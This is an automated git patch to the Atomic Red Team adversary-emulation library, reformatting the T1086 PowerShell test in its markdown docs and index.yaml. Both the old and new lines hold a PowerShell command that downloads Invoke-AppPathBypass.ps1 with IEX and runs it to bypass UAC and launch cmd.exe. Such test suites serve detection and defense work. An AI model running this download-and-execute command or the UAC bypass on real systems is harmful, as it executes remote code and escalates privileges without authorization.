From 421b5c56a3fd4de35b281e63f4561193a3ec9169 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 9 Aug 2019 14:22:16 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1086/T1086.md | 3 +--
 atomics/index.yaml     | 7 ++++---
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 3a4fd779..caa00b85 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -114,8 +114,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
 
 #### Run it with `command_prompt`!
 ```
-Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
-C:\Windows\System32\cmd.exe
+Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
 ```
 <br/>
 <br/>
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b284dd98..83cefb12 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -16699,9 +16699,10 @@ execution:
       - windows
       executor:
         name: command_prompt
-        command: |
-          Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
-          C:\Windows\System32\cmd.exe
+        command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'');
+          Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
+
+'
     - name: PowerShell Add User
       description: 'Using PS 5.1, add a user via CLI